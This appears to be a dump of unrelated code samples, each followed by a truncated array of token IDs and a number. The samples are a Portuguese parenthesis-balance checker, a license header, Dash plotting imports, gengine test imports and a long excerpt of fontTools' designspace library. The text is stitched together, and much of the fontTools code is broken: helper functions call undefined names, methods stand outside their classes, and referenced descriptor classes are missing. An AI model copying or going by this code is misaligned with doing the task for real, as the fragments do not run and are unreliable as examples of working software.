# Forma sem bugs expressao = (str(input('Digite a expresso: '))) pilhaParenteses = [] for v in expressao: if v == '(': pilhaParenteses.append('(') elif v == ')': if len(pilhaParenteses) > 0: pilhaParenteses.pop() else: pilhaParenteses.append(')') break if len(pilhaParenteses) == 0: print(f'A expresso {expressao} est vlida.') else: print(f'A expresso {expressao} est invlida!') # Forma com bugs #expressao = (str(input('Digite a expresso: '))) #if expressao.count('(') == expressao.count(')'): # print('Sua expresso est vlida.') #else: # print('Sua expresso est invlida!')
[ 2, 220, 5178, 64, 5026, 11316, 198, 42712, 5488, 796, 357, 2536, 7, 15414, 10786, 19511, 578, 257, 1033, 33852, 25, 705, 22305, 198, 79, 346, 3099, 24546, 274, 274, 796, 17635, 198, 1640, 410, 287, 4911, 5488, 25, 198, 220, 220, 220...
2.160656
305
# Copyright 2018 TNG Technology Consulting GmbH, Unterfhring, Germany # Licensed under the Apache License, Version 2.0 - see LICENSE.md in project root directory import logging from xml.sax.saxutils import escape log = logging.getLogger()
[ 2, 15069, 2864, 309, 10503, 8987, 41005, 402, 2022, 39, 11, 791, 353, 69, 71, 1806, 11, 4486, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 532, 766, 38559, 24290, 13, 9132, 287, 1628, 6808, 8619, 198, 198, 11748, ...
3.573529
68
import dash_core_components as dcc import dash_html_components as html import plotly.graph_objs as go import plotly.express as px from plotly.subplots import make_subplots import pandas as pd import math from datetime import datetime, time from utils import MONTH_NAMES, month_range """ TODO: Terminar el heatmap de alguna manera... def fig_uses(df, months): dias = ['Lunes', 'Martes', 'Mircoles', 'Jueves', 'Viernes'] days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday'] data = df[df.index.month.isin(month_range(months))] figure = go.Figure() times = data.groupby([data.index.weekday_name, pd.Grouper(freq='60min', key='Hora Inicio')]).fillna(0).sum().reset_index() day_times = times[times['Marca temporal'] == 'Monday']['Hora Inicio'].dt.time z_dict = dict() for i, d in enumerate(days): z_dict.update({dias[i]: times[times['Marca temporal'] == d]['Tiempo de uso en minutos'].fillna(0).values}) z_values = pd.DataFrame(z_dict).values figure.add_trace(go.Heatmap( x=dias, y=day_times, z=z_values)) return figure """ #def uses(df, months): # return dcc.Graph(figure=fig_uses(df, months), style={'height': '80vh'})
[ 11748, 14470, 62, 7295, 62, 5589, 3906, 355, 288, 535, 198, 11748, 14470, 62, 6494, 62, 5589, 3906, 355, 27711, 198, 11748, 7110, 306, 13, 34960, 62, 672, 8457, 355, 467, 198, 11748, 7110, 306, 13, 42712, 355, 279, 87, 198, 6738, 71...
2.490722
485
# -*- coding: utf-8 -*- from gengine.app.tests.base import BaseDBTest from gengine.app.tests.helpers import create_user, update_user, delete_user, get_or_create_language from gengine.metadata import DBSession from gengine.app.model import AuthUser
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 6738, 308, 18392, 13, 1324, 13, 41989, 13, 8692, 1330, 7308, 11012, 14402, 198, 6738, 308, 18392, 13, 1324, 13, 41989, 13, 16794, 364, 1330, 2251, 62, 7220, 11, 4296, ...
3.060241
83
from __future__ import annotations import collections import copy import itertools import math import os import posixpath from io import BytesIO, StringIO from textwrap import indent from typing import Any, Dict, List, MutableMapping, Optional, Tuple, Union from fontTools.misc import etree as ET from fontTools.misc import plistlib from fontTools.misc.loggingTools import LogMixin from fontTools.misc.textTools import tobytes, tostr """ designSpaceDocument - read and write designspace files """ __all__ = [ 'DesignSpaceDocumentError', 'DesignSpaceDocument', 'SourceDescriptor', 'InstanceDescriptor', 'AxisDescriptor', 'RuleDescriptor', 'BaseDocReader', 'BaseDocWriter' ] # ElementTree allows to find namespace-prefixed elements, but not attributes # so we have to do it ourselves for 'xml:lang' XML_NS = "{http://www.w3.org/XML/1998/namespace}" XML_LANG = XML_NS + "lang" def posix(path): """Normalize paths using forward slash to work also on Windows.""" new_path = posixpath.join(*path.split(os.path.sep)) if path.startswith('/'): # The above transformation loses absolute paths new_path = '/' + new_path elif path.startswith(r'\\'): # The above transformation loses leading slashes of UNC path mounts new_path = '//' + new_path return new_path def posixpath_property(private_name): """Generate a propery that holds a path always using forward slashes.""" return property(getter, setter) def getFamilyName(self, languageCode="en"): """Getter for :attr:`localisedFamilyName` .. versionadded:: 5.0 """ return self.localisedFamilyName.get(languageCode) def getFullDesignLocation(self, doc: 'DesignSpaceDocument') -> AnisotropicLocationDict: """Get the complete design location of this source, from its :attr:`designLocation` and the document's axis defaults. .. versionadded:: 5.0 """ result: AnisotropicLocationDict = {} for axis in doc.axes: if axis.name in self.designLocation: result[axis.name] = self.designLocation[axis.name] else: result[axis.name] = axis.map_forward(axis.default) return result class RuleDescriptor(SimpleDescriptor): """Represents the rule descriptor element: a set of glyph substitutions to trigger conditionally in some parts of the designspace. .. code:: python r1 = RuleDescriptor() r1.name = "unique.rule.name" r1.conditionSets.append([dict(name="weight", minimum=-10, maximum=10), dict(...)]) r1.conditionSets.append([dict(...), dict(...)]) r1.subs.append(("a", "a.alt")) .. code:: xml <!-- optional: list of substitution rules --> <rules> <rule name="vertical.bars"> <conditionset> <condition minimum="250.000000" maximum="750.000000" name="weight"/> <condition minimum="100" name="width"/> <condition minimum="10" maximum="40" name="optical"/> </conditionset> <sub name="cent" with="cent.alt"/> <sub name="dollar" with="dollar.alt"/> </rule> </rules> """ _attrs = ['name', 'conditionSets', 'subs'] # what do we need here def evaluateRule(rule, location): """Return True if any of the rule's conditionsets matches the given location.""" return any(evaluateConditions(c, location) for c in rule.conditionSets) def evaluateConditions(conditions, location): """Return True if all the conditions matches the given location. - If a condition has no minimum, check for < maximum. - If a condition has no maximum, check for > minimum. """ for cd in conditions: value = location[cd['name']] if cd.get('minimum') is None: if value > cd['maximum']: return False elif cd.get('maximum') is None: if cd['minimum'] > value: return False elif not cd['minimum'] <= value <= cd['maximum']: return False return True def processRules(rules, location, glyphNames): """Apply these rules at this location to these glyphnames. Return a new list of glyphNames with substitutions applied. - rule order matters """ newNames = [] for rule in rules: if evaluateRule(rule, location): for name in glyphNames: swap = False for a, b in rule.subs: if name == a: swap = True break if swap: newNames.append(b) else: newNames.append(name) glyphNames = newNames newNames = [] return glyphNames AnisotropicLocationDict = Dict[str, Union[float, Tuple[float, float]]] SimpleLocationDict = Dict[str, float] def clearLocation(self, axisName: Optional[str] = None): """Clear all location-related fields. Ensures that :attr:``designLocation`` and :attr:``userLocation`` are dictionaries (possibly empty if clearing everything). In order to update the location of this instance wholesale, a user should first clear all the fields, then change the field(s) for which they have data. .. code:: python instance.clearLocation() instance.designLocation = {'Weight': (34, 36.5), 'Width': 100} instance.userLocation = {'Opsz': 16} In order to update a single axis location, the user should only clear that axis, then edit the values: .. code:: python instance.clearLocation('Weight') instance.designLocation['Weight'] = (34, 36.5) Args: axisName: if provided, only clear the location for that axis. .. versionadded:: 5.0 """ self.locationLabel = None if axisName is None: self.designLocation = {} self.userLocation = {} else: if self.designLocation is None: self.designLocation = {} if axisName in self.designLocation: del self.designLocation[axisName] if self.userLocation is None: self.userLocation = {} if axisName in self.userLocation: del self.userLocation[axisName] def getLocationLabelDescriptor(self, doc: 'DesignSpaceDocument') -> Optional[LocationLabelDescriptor]: """Get the :class:`LocationLabelDescriptor` instance that matches this instances's :attr:`locationLabel`. Raises if the named label can't be found. .. versionadded:: 5.0 """ if self.locationLabel is None: return None label = doc.getLocationLabel(self.locationLabel) if label is None: raise DesignSpaceDocumentError( 'InstanceDescriptor.getLocationLabelDescriptor(): ' f'unknown location label `{self.locationLabel}` in instance `{self.name}`.' ) return label def getFullDesignLocation(self, doc: 'DesignSpaceDocument') -> AnisotropicLocationDict: """Get the complete design location of this instance, by combining data from the various location fields, default axis values and mappings, and top-level location labels. The source of truth for this instance's location is determined for each axis independently by taking the first not-None field in this list: - ``locationLabel``: the location along this axis is the same as the matching STAT format 4 label. No anisotropy. - ``designLocation[axisName]``: the explicit design location along this axis, possibly anisotropic. - ``userLocation[axisName]``: the explicit user location along this axis. No anisotropy. - ``axis.default``: default axis value. No anisotropy. .. versionadded:: 5.0 """ label = self.getLocationLabelDescriptor(doc) if label is not None: return doc.map_forward(label.userLocation) # type: ignore result: AnisotropicLocationDict = {} for axis in doc.axes: if axis.name in self.designLocation: result[axis.name] = self.designLocation[axis.name] elif axis.name in self.userLocation: result[axis.name] = axis.map_forward(self.userLocation[axis.name]) else: result[axis.name] = axis.map_forward(axis.default) return result def getFullUserLocation(self, doc: 'DesignSpaceDocument') -> SimpleLocationDict: """Get the complete user location for this instance. .. seealso:: :meth:`getFullDesignLocation` .. versionadded:: 5.0 """ return doc.map_backward(self.getFullDesignLocation(doc)) def tagForAxisName(name): # try to find or make a tag name for this axis name names = { 'weight': ('wght', dict(en = 'Weight')), 'width': ('wdth', dict(en = 'Width')), 'optical': ('opsz', dict(en = 'Optical Size')), 'slant': ('slnt', dict(en = 'Slant')), 'italic': ('ital', dict(en = 'Italic')), } if name.lower() in names: return names[name.lower()] if len(name) < 4: tag = name + "*" * (4 - len(name)) else: tag = name[:4] return tag, dict(en=name) class AbstractAxisDescriptor(SimpleDescriptor): flavor = "axis" class AxisDescriptor(AbstractAxisDescriptor): """ Simple container for the axis data. Add more localisations? .. code:: python a1 = AxisDescriptor() a1.minimum = 1 a1.maximum = 1000 a1.default = 400 a1.name = "weight" a1.tag = "wght" a1.labelNames['fa-IR'] = "" a1.labelNames['en'] = "Wght" a1.map = [(1.0, 10.0), (400.0, 66.0), (1000.0, 990.0)] a1.axisOrdering = 1 a1.axisLabels = [ AxisLabelDescriptor(name="Regular", userValue=400, elidable=True) ] doc.addAxis(a1) """ _attrs = ['tag', 'name', 'maximum', 'minimum', 'default', 'map', 'axisOrdering', 'axisLabels'] def map_forward(self, v): """Maps value from axis mapping's input (user) to output (design).""" from fontTools.varLib.models import piecewiseLinearMap if not self.map: return v return piecewiseLinearMap(v, {k: v for k, v in self.map}) def map_backward(self, v): """Maps value from axis mapping's output (design) to input (user).""" from fontTools.varLib.models import piecewiseLinearMap if isinstance(v, tuple): v = v[0] if not self.map: return v return piecewiseLinearMap(v, {v: k for k, v in self.map}) class DiscreteAxisDescriptor(AbstractAxisDescriptor): """Container for discrete axis data. Use this for axes that do not interpolate. The main difference from a continuous axis is that a continuous axis has a ``minimum`` and ``maximum``, while a discrete axis has a list of ``values``. Example: an Italic axis with 2 stops, Roman and Italic, that are not compatible. The axis still allows to bind together the full font family, which is useful for the STAT table, however it can't become a variation axis in a VF. .. code:: python a2 = DiscreteAxisDescriptor() a2.values = [0, 1] a2.name = "Italic" a2.tag = "ITAL" a2.labelNames['fr'] = "Italique" a2.map = [(0, 0), (1, -11)] a2.axisOrdering = 2 a2.axisLabels = [ AxisLabelDescriptor(name="Roman", userValue=0, elidable=True) ] doc.addAxis(a2) .. versionadded:: 5.0 """ flavor = "axis" _attrs = ('tag', 'name', 'values', 'default', 'map', 'axisOrdering', 'axisLabels') def map_forward(self, value): """Maps value from axis mapping's input to output. Returns value unchanged if no mapping entry is found. Note: for discrete axes, each value must have its mapping entry, if you intend that value to be mapped. """ return next((v for k, v in self.map if k == value), value) def map_backward(self, value): """Maps value from axis mapping's output to input. Returns value unchanged if no mapping entry is found. Note: for discrete axes, each value must have its mapping entry, if you intend that value to be mapped. """ if isinstance(value, tuple): value = value[0] return next((k for k, v in self.map if v == value), value) class AxisLabelDescriptor(SimpleDescriptor): """Container for axis label data. Analogue of OpenType's STAT data for a single axis (formats 1, 2 and 3). All values are user values. See: `OTSpec STAT Axis value table, format 1, 2, 3 <https://docs.microsoft.com/en-us/typography/opentype/spec/stat#axis-value-table-format-1>`_ The STAT format of the Axis value depends on which field are filled-in, see :meth:`getFormat` .. versionadded:: 5.0 """ flavor = "label" _attrs = ('userMinimum', 'userValue', 'userMaximum', 'name', 'elidable', 'olderSibling', 'linkedUserValue', 'labelNames') def getFormat(self) -> int: """Determine which format of STAT Axis value to use to encode this label. =========== ========= =========== =========== =============== STAT Format userValue userMinimum userMaximum linkedUserValue =========== ========= =========== =========== =============== 1 2 3 =========== ========= =========== =========== =============== """ if self.linkedUserValue is not None: return 3 if self.userMinimum is not None or self.userMaximum is not None: return 2 return 1 def write(self, pretty=True, encoding="UTF-8", xml_declaration=True): self.root.attrib['format'] = ".".join(str(i) for i in self.effectiveFormatTuple) if self.documentObject.axes or self.documentObject.elidedFallbackName is not None: axesElement = ET.Element("axes") if self.documentObject.elidedFallbackName is not None: axesElement.attrib['elidedfallbackname'] = self.documentObject.elidedFallbackName self.root.append(axesElement) for axisObject in self.documentObject.axes: self._addAxis(axisObject) if self.documentObject.locationLabels: labelsElement = ET.Element("labels") for labelObject in self.documentObject.locationLabels: self._addLocationLabel(labelsElement, labelObject) self.root.append(labelsElement) if self.documentObject.rules: if getattr(self.documentObject, "rulesProcessingLast", False): attributes = {"processing": "last"} else: attributes = {} self.root.append(ET.Element("rules", attributes)) for ruleObject in self.documentObject.rules: self._addRule(ruleObject) if self.documentObject.sources: self.root.append(ET.Element("sources")) for sourceObject in self.documentObject.sources: self._addSource(sourceObject) if self.documentObject.variableFonts: variableFontsElement = ET.Element("variable-fonts") for variableFont in self.documentObject.variableFonts: self._addVariableFont(variableFontsElement, variableFont) self.root.append(variableFontsElement) if self.documentObject.instances: self.root.append(ET.Element("instances")) for instanceObject in self.documentObject.instances: self._addInstance(instanceObject) if self.documentObject.lib: self._addLib(self.root, self.documentObject.lib, 2) tree = ET.ElementTree(self.root) tree.write( self.path, encoding=encoding, method='xml', xml_declaration=xml_declaration, pretty_print=pretty, ) def _getEffectiveFormatTuple(self): """Try to use the version specified in the document, or a sufficiently recent version to be able to encode what the document contains. """ minVersion = self.documentObject.formatTuple if ( any( isinstance(axis, DiscreteAxisDescriptor) or axis.axisOrdering is not None or axis.axisLabels for axis in self.documentObject.axes ) or self.documentObject.locationLabels or any( source.localisedFamilyName for source in self.documentObject.sources ) or self.documentObject.variableFonts or any( instance.locationLabel or instance.userLocation for instance in self.documentObject.instances ) ): if minVersion < (5, 0): minVersion = (5, 0) return minVersion def _makeLocationElement(self, locationObject, name=None): """ Convert Location dict to a locationElement.""" locElement = ET.Element("location") if name is not None: locElement.attrib['name'] = name validatedLocation = self.documentObject.newDefaultLocation() for axisName, axisValue in locationObject.items(): if axisName in validatedLocation: # only accept values we know validatedLocation[axisName] = axisValue for dimensionName, dimensionValue in validatedLocation.items(): dimElement = ET.Element('dimension') dimElement.attrib['name'] = dimensionName if type(dimensionValue) == tuple: dimElement.attrib['xvalue'] = self.intOrFloat(dimensionValue[0]) dimElement.attrib['yvalue'] = self.intOrFloat(dimensionValue[1]) else: dimElement.attrib['xvalue'] = self.intOrFloat(dimensionValue) locElement.append(dimElement) return locElement, validatedLocation def intOrFloat(self, num): if int(num) == num: return "%d" % num return ("%f" % num).rstrip('0').rstrip('.') def _addRule(self, ruleObject): # if none of the conditions have minimum or maximum values, do not add the rule. ruleElement = ET.Element('rule') if ruleObject.name is not None: ruleElement.attrib['name'] = ruleObject.name for conditions in ruleObject.conditionSets: conditionsetElement = ET.Element('conditionset') for cond in conditions: if cond.get('minimum') is None and cond.get('maximum') is None: # neither is defined, don't add this condition continue conditionElement = ET.Element('condition') conditionElement.attrib['name'] = cond.get('name') if cond.get('minimum') is not None: conditionElement.attrib['minimum'] = self.intOrFloat(cond.get('minimum')) if cond.get('maximum') is not None: conditionElement.attrib['maximum'] = self.intOrFloat(cond.get('maximum')) conditionsetElement.append(conditionElement) if len(conditionsetElement): ruleElement.append(conditionsetElement) for sub in ruleObject.subs: subElement = ET.Element('sub') subElement.attrib['name'] = sub[0] subElement.attrib['with'] = sub[1] ruleElement.append(subElement) if len(ruleElement): self.root.findall('.rules')[0].append(ruleElement) class BaseDocReader(LogMixin): axisDescriptorClass = AxisDescriptor discreteAxisDescriptorClass = DiscreteAxisDescriptor axisLabelDescriptorClass = AxisLabelDescriptor locationLabelDescriptorClass = LocationLabelDescriptor ruleDescriptorClass = RuleDescriptor sourceDescriptorClass = SourceDescriptor variableFontsDescriptorClass = VariableFontDescriptor valueAxisSubsetDescriptorClass = ValueAxisSubsetDescriptor rangeAxisSubsetDescriptorClass = RangeAxisSubsetDescriptor instanceDescriptorClass = InstanceDescriptor def locationFromElement(self, element): """Read a nested ``<location>`` element inside the given ``element``. .. versionchanged:: 5.0 Return a tuple of (designLocation, userLocation) """ elementLocation = (None, None) for locationElement in element.findall('.location'): elementLocation = self.readLocationElement(locationElement) break return elementLocation def readLocationElement(self, locationElement): """Read a ``<location>`` element. .. versionchanged:: 5.0 Return a tuple of (designLocation, userLocation) """ if self._strictAxisNames and not self.documentObject.axes: raise DesignSpaceDocumentError("No axes defined") userLoc = {} designLoc = {} for dimensionElement in locationElement.findall(".dimension"): dimName = dimensionElement.attrib.get("name") if self._strictAxisNames and dimName not in self.axisDefaults: # In case the document contains no axis definitions, self.log.warning("Location with undefined axis: \"%s\".", dimName) continue userValue = xValue = yValue = None try: userValue = dimensionElement.attrib.get('uservalue') if userValue is not None: userValue = float(userValue) except ValueError: self.log.warning("ValueError in readLocation userValue %3.3f", userValue) try: xValue = dimensionElement.attrib.get('xvalue') if xValue is not None: xValue = float(xValue) except ValueError: self.log.warning("ValueError in readLocation xValue %3.3f", xValue) try: yValue = dimensionElement.attrib.get('yvalue') if yValue is not None: yValue = float(yValue) except ValueError: self.log.warning("ValueError in readLocation yValue %3.3f", yValue) if userValue is None == xValue is None: raise DesignSpaceDocumentError(f'Exactly one of uservalue="" or xvalue="" must be provided for location dimension "{dimName}"') if yValue is not None: if xValue is None: raise DesignSpaceDocumentError(f'Missing xvalue="" for the location dimension "{dimName}"" with yvalue="{yValue}"') designLoc[dimName] = (xValue, yValue) elif xValue is not None: designLoc[dimName] = xValue else: userLoc[dimName] = userValue return designLoc, userLoc def readLibElement(self, libElement, instanceObject): """Read the lib element for the given instance.""" instanceObject.lib = plistlib.fromtree(libElement[0]) def readInfoElement(self, infoElement, instanceObject): """ Read the info element.""" instanceObject.info = True def readGlyphElement(self, glyphElement, instanceObject): """ Read the glyph element, which could look like either one of these: .. code-block:: xml <glyph name="b" unicode="0x62"/> <glyph name="b"/> <glyph name="b"> <master location="location-token-bbb" source="master-token-aaa2"/> <master glyphname="b.alt1" location="location-token-ccc" source="master-token-aaa3"/> <note> This is an instance from an anisotropic interpolation. </note> </glyph> """ glyphData = {} glyphName = glyphElement.attrib.get('name') if glyphName is None: raise DesignSpaceDocumentError("Glyph object without name attribute") mute = glyphElement.attrib.get("mute") if mute == "1": glyphData['mute'] = True # unicode unicodes = glyphElement.attrib.get('unicode') if unicodes is not None: try: unicodes = [int(u, 16) for u in unicodes.split(" ")] glyphData['unicodes'] = unicodes except ValueError: raise DesignSpaceDocumentError("unicode values %s are not integers" % unicodes) for noteElement in glyphElement.findall('.note'): glyphData['note'] = noteElement.text break designLocation, userLocation = self.locationFromElement(glyphElement) if userLocation: raise DesignSpaceDocumentError(f'<glyph> element "{glyphName}" must only have design locations (using xvalue="").') if designLocation is not None: glyphData['instanceLocation'] = designLocation glyphSources = None for masterElement in glyphElement.findall('.masters/master'): fontSourceName = masterElement.attrib.get('source') designLocation, userLocation = self.locationFromElement(masterElement) if userLocation: raise DesignSpaceDocumentError(f'<master> element "{fontSourceName}" must only have design locations (using xvalue="").') masterGlyphName = masterElement.attrib.get('glyphname') if masterGlyphName is None: # if we don't read a glyphname, use the one we have masterGlyphName = glyphName d = dict(font=fontSourceName, location=designLocation, glyphName=masterGlyphName) if glyphSources is None: glyphSources = [] glyphSources.append(d) if glyphSources is not None: glyphData['masters'] = glyphSources instanceObject.glyphs[glyphName] = glyphData def readLib(self): """Read the lib element for the whole document.""" for libElement in self.root.findall(".lib"): self.documentObject.lib = plistlib.fromtree(libElement[0]) class DesignSpaceDocument(LogMixin, AsDictMixin): """The DesignSpaceDocument object can read and write ``.designspace`` data. It imports the axes, sources, variable fonts and instances to very basic **descriptor** objects that store the data in attributes. Data is added to the document by creating such descriptor objects, filling them with data and then adding them to the document. This makes it easy to integrate this object in different contexts. The **DesignSpaceDocument** object can be subclassed to work with different objects, as long as they have the same attributes. Reader and Writer objects can be subclassed as well. **Note:** Python attribute names are usually camelCased, the corresponding `XML <document-xml-structure>`_ attributes are usually all lowercase. .. code:: python from fontTools.designspaceLib import DesignSpaceDocument doc = DesignSpaceDocument.fromfile("some/path/to/my.designspace") doc.formatVersion doc.elidedFallbackName doc.axes doc.locationLabels doc.rules doc.rulesProcessingLast doc.sources doc.variableFonts doc.instances doc.lib """ def tostring(self, encoding=None): """Returns the designspace as a string. Default encoding ``utf-8``.""" if encoding is str or ( encoding is not None and encoding.lower() == "unicode" ): f = StringIO() xml_declaration = False elif encoding is None or encoding == "utf-8": f = BytesIO() encoding = "UTF-8" xml_declaration = True else: raise ValueError("unsupported encoding: '%s'" % encoding) writer = self.writerClass(f, self) writer.write(encoding=encoding, xml_declaration=xml_declaration) return f.getvalue() def read(self, path): """Read a designspace file from ``path`` and populates the fields of ``self`` with the data. """ if hasattr(path, "__fspath__"): # support os.PathLike objects path = path.__fspath__() self.path = path self.filename = os.path.basename(path) reader = self.readerClass(path, self) reader.read() if self.sources: self.findDefault() def write(self, path): """Write this designspace to ``path``.""" if hasattr(path, "__fspath__"): # support os.PathLike objects path = path.__fspath__() self.path = path self.filename = os.path.basename(path) self.updatePaths() writer = self.writerClass(path, self) writer.write() def updatePaths(self): """ Right before we save we need to identify and respond to the following situations: In each descriptor, we have to do the right thing for the filename attribute. :: case 1. descriptor.filename == None descriptor.path == None -- action: write as is, descriptors will not have a filename attr. useless, but no reason to interfere. case 2. descriptor.filename == "../something" descriptor.path == None -- action: write as is. The filename attr should not be touched. case 3. descriptor.filename == None descriptor.path == "~/absolute/path/there" -- action: calculate the relative path for filename. We're not overwriting some other value for filename, it should be fine case 4. descriptor.filename == '../somewhere' descriptor.path == "~/absolute/path/there" -- action: there is a conflict between the given filename, and the path. So we know where the file is relative to the document. Can't guess why they're different, we just choose for path to be correct and update filename. """ assert self.path is not None for descriptor in self.sources + self.instances: if descriptor.path is not None: # case 3 and 4: filename gets updated and relativized descriptor.filename = self._posixRelativePath(descriptor.path) def addSource(self, sourceDescriptor: SourceDescriptor): """Add the given ``sourceDescriptor`` to ``doc.sources``.""" self.sources.append(sourceDescriptor) def addSourceDescriptor(self, **kwargs): """Instantiate a new :class:`SourceDescriptor` using the given ``kwargs`` and add it to ``doc.sources``. """ source = self.writerClass.sourceDescriptorClass(**kwargs) self.addSource(source) return source def addInstance(self, instanceDescriptor: InstanceDescriptor): """Add the given ``instanceDescriptor`` to :attr:`instances`.""" self.instances.append(instanceDescriptor) def addInstanceDescriptor(self, **kwargs): """Instantiate a new :class:`InstanceDescriptor` using the given ``kwargs`` and add it to :attr:`instances`. """ instance = self.writerClass.instanceDescriptorClass(**kwargs) self.addInstance(instance) return instance def addAxis(self, axisDescriptor: Union[AxisDescriptor, DiscreteAxisDescriptor]): """Add the given ``axisDescriptor`` to :attr:`axes`.""" self.axes.append(axisDescriptor) def addAxisDescriptor(self, **kwargs): """Instantiate a new :class:`AxisDescriptor` using the given ``kwargs`` and add it to :attr:`axes`. The axis will be and instance of :class:`DiscreteAxisDescriptor` if the ``kwargs`` provide a ``value``, or a :class:`AxisDescriptor` otherwise. """ if "values" in kwargs: axis = self.writerClass.discreteAxisDescriptorClass(**kwargs) else: axis = self.writerClass.axisDescriptorClass(**kwargs) self.addAxis(axis) return axis def addRule(self, ruleDescriptor: RuleDescriptor): """Add the given ``ruleDescriptor`` to :attr:`rules`.""" self.rules.append(ruleDescriptor) def addRuleDescriptor(self, **kwargs): """Instantiate a new :class:`RuleDescriptor` using the given ``kwargs`` and add it to :attr:`rules`. """ rule = self.writerClass.ruleDescriptorClass(**kwargs) self.addRule(rule) return rule def addVariableFont(self, variableFontDescriptor: VariableFontDescriptor): """Add the given ``variableFontDescriptor`` to :attr:`variableFonts`. .. versionadded:: 5.0 """ self.variableFonts.append(variableFontDescriptor) def addVariableFontDescriptor(self, **kwargs): """Instantiate a new :class:`VariableFontDescriptor` using the given ``kwargs`` and add it to :attr:`variableFonts`. .. versionadded:: 5.0 """ variableFont = self.writerClass.variableFontDescriptorClass(**kwargs) self.addVariableFont(variableFont) return variableFont def addLocationLabel(self, locationLabelDescriptor: LocationLabelDescriptor): """Add the given ``locationLabelDescriptor`` to :attr:`locationLabels`. .. versionadded:: 5.0 """ self.locationLabels.append(locationLabelDescriptor) def addLocationLabelDescriptor(self, **kwargs): """Instantiate a new :class:`LocationLabelDescriptor` using the given ``kwargs`` and add it to :attr:`locationLabels`. .. versionadded:: 5.0 """ locationLabel = self.writerClass.locationLabelDescriptorClass(**kwargs) self.addLocationLabel(locationLabel) return locationLabel def newDefaultLocation(self): """Return a dict with the default location in design space coordinates.""" # Without OrderedDict, output XML would be non-deterministic. # https://github.com/LettError/designSpaceDocument/issues/10 loc = collections.OrderedDict() for axisDescriptor in self.axes: loc[axisDescriptor.name] = axisDescriptor.map_forward( axisDescriptor.default ) return loc def labelForUserLocation(self, userLocation: SimpleLocationDict) -> Optional[LocationLabelDescriptor]: """Return the :class:`LocationLabel` that matches the given ``userLocation``, or ``None`` if no such label exists. .. versionadded:: 5.0 """ return next( (label for label in self.locationLabels if label.userLocation == userLocation), None ) def updateFilenameFromPath(self, masters=True, instances=True, force=False): """Set a descriptor filename attr from the path and this document path. If the filename attribute is not None: skip it. """ if masters: for descriptor in self.sources: if descriptor.filename is not None and not force: continue if self.path is not None: descriptor.filename = self._posixRelativePath(descriptor.path) if instances: for descriptor in self.instances: if descriptor.filename is not None and not force: continue if self.path is not None: descriptor.filename = self._posixRelativePath(descriptor.path) def newAxisDescriptor(self): """Ask the writer class to make us a new axisDescriptor.""" return self.writerClass.getAxisDecriptor() def newSourceDescriptor(self): """Ask the writer class to make us a new sourceDescriptor.""" return self.writerClass.getSourceDescriptor() def newInstanceDescriptor(self): """Ask the writer class to make us a new instanceDescriptor.""" return self.writerClass.getInstanceDescriptor() def getAxisOrder(self): """Return a list of axis names, in the same order as defined in the document.""" names = [] for axisDescriptor in self.axes: names.append(axisDescriptor.name) return names def getAxis(self, name): """Return the axis with the given ``name``, or ``None`` if no such axis exists.""" for axisDescriptor in self.axes: if axisDescriptor.name == name: return axisDescriptor return None def getLocationLabel(self, name: str) -> Optional[LocationLabelDescriptor]: """Return the top-level location label with the given ``name``, or ``None`` if no such label exists. .. versionadded:: 5.0 """ for label in self.locationLabels: if label.name == name: return label return None def map_forward(self, userLocation: SimpleLocationDict) -> SimpleLocationDict: """Map a user location to a design location. Assume that missing coordinates are at the default location for that axis. Note: the output won't be anisotropic, only the xvalue is set. .. versionadded:: 5.0 """ return { axis.name: axis.map_forward(userLocation.get(axis.name, axis.default)) for axis in self.axes } def map_backward(self, designLocation: AnisotropicLocationDict) -> SimpleLocationDict: """Map a design location to a user location. Assume that missing coordinates are at the default location for that axis. When the input has anisotropic locations, only the xvalue is used. .. versionadded:: 5.0 """ return { axis.name: ( axis.map_backward(designLocation[axis.name]) if axis.name in designLocation else axis.default ) for axis in self.axes } def findDefault(self): """Set and return SourceDescriptor at the default location or None. The default location is the set of all `default` values in user space of all axes. This function updates the document's :attr:`default` value. .. versionchanged:: 5.0 Allow the default source to not specify some of the axis values, and they are assumed to be the default. See :meth:`SourceDescriptor.getFullDesignLocation()` """ self.default = None # Convert the default location from user space to design space before comparing # it against the SourceDescriptor locations (always in design space). defaultDesignLocation = self.newDefaultLocation() for sourceDescriptor in self.sources: if sourceDescriptor.getFullDesignLocation(self) == defaultDesignLocation: self.default = sourceDescriptor return sourceDescriptor return None def normalizeLocation(self, location): """Return a dict with normalized axis values.""" from fontTools.varLib.models import normalizeValue new = {} for axis in self.axes: if axis.name not in location: # skipping this dimension it seems continue value = location[axis.name] # 'anisotropic' location, take first coord only if isinstance(value, tuple): value = value[0] triple = [ axis.map_forward(v) for v in (axis.minimum, axis.default, axis.maximum) ] new[axis.name] = normalizeValue(value, triple) return new def normalize(self): """ Normalise the geometry of this designspace: - scale all the locations of all masters and instances to the -1 - 0 - 1 value. - we need the axis data to do the scaling, so we do those last. """ # masters for item in self.sources: item.location = self.normalizeLocation(item.location) # instances for item in self.instances: # glyph masters for this instance for _, glyphData in item.glyphs.items(): glyphData['instanceLocation'] = self.normalizeLocation(glyphData['instanceLocation']) for glyphMaster in glyphData['masters']: glyphMaster['location'] = self.normalizeLocation(glyphMaster['location']) item.location = self.normalizeLocation(item.location) # the axes for axis in self.axes: # scale the map first newMap = [] for inputValue, outputValue in axis.map: newOutputValue = self.normalizeLocation({axis.name: outputValue}).get(axis.name) newMap.append((inputValue, newOutputValue)) if newMap: axis.map = newMap # finally the axis values minimum = self.normalizeLocation({axis.name: axis.minimum}).get(axis.name) maximum = self.normalizeLocation({axis.name: axis.maximum}).get(axis.name) default = self.normalizeLocation({axis.name: axis.default}).get(axis.name) # and set them in the axis.minimum axis.minimum = minimum axis.maximum = maximum axis.default = default # now the rules for rule in self.rules: newConditionSets = [] for conditions in rule.conditionSets: newConditions = [] for cond in conditions: if cond.get('minimum') is not None: minimum = self.normalizeLocation({cond['name']: cond['minimum']}).get(cond['name']) else: minimum = None if cond.get('maximum') is not None: maximum = self.normalizeLocation({cond['name']: cond['maximum']}).get(cond['name']) else: maximum = None newConditions.append(dict(name=cond['name'], minimum=minimum, maximum=maximum)) newConditionSets.append(newConditions) rule.conditionSets = newConditionSets def loadSourceFonts(self, opener, **kwargs): """Ensure SourceDescriptor.font attributes are loaded, and return list of fonts. Takes a callable which initializes a new font object (e.g. TTFont, or defcon.Font, etc.) from the SourceDescriptor.path, and sets the SourceDescriptor.font attribute. 